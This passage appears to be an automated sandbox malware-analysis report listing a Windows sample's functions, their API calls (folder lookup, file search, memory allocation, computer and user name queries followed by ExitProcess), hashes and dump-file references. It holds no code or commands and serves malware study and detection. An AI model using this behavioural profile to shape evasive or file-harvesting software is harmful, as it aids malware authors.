                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoSystemwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 2452939696-0
                                                                                          • Opcode ID: b67a8d3803bdbcef095136fe51fb218f504635533fc880d72ddeb760f53951d8
                                                                                          • Instruction ID: e5f7882cf5308591a3a92d8d4ad10ccbd8a019f3ce2acafa6204cd8ee8253483
                                                                                          • Opcode Fuzzy Hash: b67a8d3803bdbcef095136fe51fb218f504635533fc880d72ddeb760f53951d8
                                                                                          • Instruction Fuzzy Hash: 2DF0C2B1A00618EBCB10CF88ED45FAAB7BDFB08724F50066AF50492280D7785904CB94
                                                                                          Function 0040B370 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
                                                                                            • Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
                                                                                            • Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040B820
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040B834
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 4023347672-0
                                                                                          • Opcode ID: 42a7ad65bae4e9558e0380f2075f04e5ea268d23bcb951c8a89b1ddadc345638
                                                                                          • Instruction ID: 12fecfe212cb7392b3f17e260ebd7fbbf5924c22592aec839546a7360daeb2af
                                                                                          • Opcode Fuzzy Hash: 42a7ad65bae4e9558e0380f2075f04e5ea268d23bcb951c8a89b1ddadc345638
                                                                                          • Instruction Fuzzy Hash: 5DE12272911118ABCB14EBA1CC96EEE7339BF14314F40415EF507721A1EF786B98CB6A
                                                                                          Function 0040AD70 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040AFEA
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040AFFE
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$lstrlen$lstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 2500673778-0
                                                                                          • Opcode ID: 1dbadf0351bfe0d456c8441b72d0781cfe79819e97f9c8658590d48fe0b3a877
                                                                                          • Instruction ID: 4b138641442dd51730d9762ac92e0d5652ebadbf156882a2c3fe3545aa946475
                                                                                          • Opcode Fuzzy Hash: 1dbadf0351bfe0d456c8441b72d0781cfe79819e97f9c8658590d48fe0b3a877
                                                                                          • Instruction Fuzzy Hash: 98915572911108ABCF14FBA1DC96EEE7339AF54314F40416EF40772191EF786A98CB6A
                                                                                          Function 0040B0B0 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040B2AE
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$lstrlen$lstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 2500673778-0
                                                                                          • Opcode ID: 2c6e631158fd8132a9939cbc95aa03e1859264bdf7cf7f2be2d91b3cfbbd0b89
                                                                                          • Instruction ID: d2f8e92f06f21ad00195b851541a0fca05b03a5e78dc2554d63ff73f5d8ac6c5
                                                                                          • Opcode Fuzzy Hash: 2c6e631158fd8132a9939cbc95aa03e1859264bdf7cf7f2be2d91b3cfbbd0b89
                                                                                          • Instruction Fuzzy Hash: A9717371911108ABCF14FBA1DC56EEE7339BF54314F40412EF403A2191EF786A58CBAA
                                                                                          Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
                                                                                          • VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: badb7cecddd27d9e1aa55144c1fc7f4ba9690274eb5e83060997e099dbd08bd4
                                                                                          • Instruction ID: 4499aa19cc86b02a1bac446f32e864e245a0bde13e44bf0a480e22725e368a89
                                                                                          • Opcode Fuzzy Hash: badb7cecddd27d9e1aa55144c1fc7f4ba9690274eb5e83060997e099dbd08bd4
                                                                                          • Instruction Fuzzy Hash: 2B41F334A00208EFCB44CF58C494BADBBB1FF44314F1486A9E94AAB385C735EA91CF84
                                                                                          Function 00414B30 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00414B6A
                                                                                          • lstrcat.KERNEL32(?,0081A8E0), ref: 00414B88
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
                                                                                            • Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 2699682494-0
                                                                                          • Opcode ID: 129850b5d2f275a351fed680d92c083f50d225a6d08bec1a346a19f631c1447b
                                                                                          • Instruction ID: 3c3433cccd63aeccdbe2a936e698fd88f8205579aacfd307105c0296dbc1629e
                                                                                          • Opcode Fuzzy Hash: 129850b5d2f275a351fed680d92c083f50d225a6d08bec1a346a19f631c1447b
                                                                                          • Instruction Fuzzy Hash: 8B01967690021C67CB24FB60DC46EDE733C9B64304F40415EBA4A57191FEB8AAC98BE5
                                                                                          Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
                                                                                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,004164BC), ref: 004010F7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$AllocFree
                                                                                          • String ID:
                                                                                          • API String ID: 2087232378-0
                                                                                          • Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
                                                                                          • Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
                                                                                          • Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
                                                                                          • Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64
                                                                                          Function 00418830 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 556a7a6c9be2d053d607ba92e7c834e3128791a2465422ba457eb21d59b8c603
                                                                                          • Instruction ID: 05b335d21f22619e77aa966aeb7f376ddd46b9d978e537c949d5f100d696e3dd
                                                                                          • Opcode Fuzzy Hash: 556a7a6c9be2d053d607ba92e7c834e3128791a2465422ba457eb21d59b8c603
                                                                                          • Instruction Fuzzy Hash: 70F01570C0020CEFCB04EFA5C9496DDBB75EB00324F50859EE82AA7281DBB85B95CB85
                                                                                          Function 00418880 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FolderPathlstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 1699248803-0
                                                                                          • Opcode ID: 51571f28d6a7ed4813964dc8c522bdbe61ee22cda778a467bc1242f5a69e0a37
                                                                                          • Instruction ID: 7b71b80bc5ec6c4d76f30a423bf4d75a71df8f4b6dd8708b5fa25dfbbe6c75fa
                                                                                          • Opcode Fuzzy Hash: 51571f28d6a7ed4813964dc8c522bdbe61ee22cda778a467bc1242f5a69e0a37
                                                                                          • Instruction Fuzzy Hash: 7AE01A31A4034C7BDB55EBA0CC96FEE736CAB44B15F004299BA0C5B1C0EE74AB858B91
                                                                                          Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
                                                                                            • Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
                                                                                            • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
                                                                                            • Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
                                                                                            • Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
                                                                                            • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
                                                                                          • ExitProcess.KERNEL32 ref: 004011C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
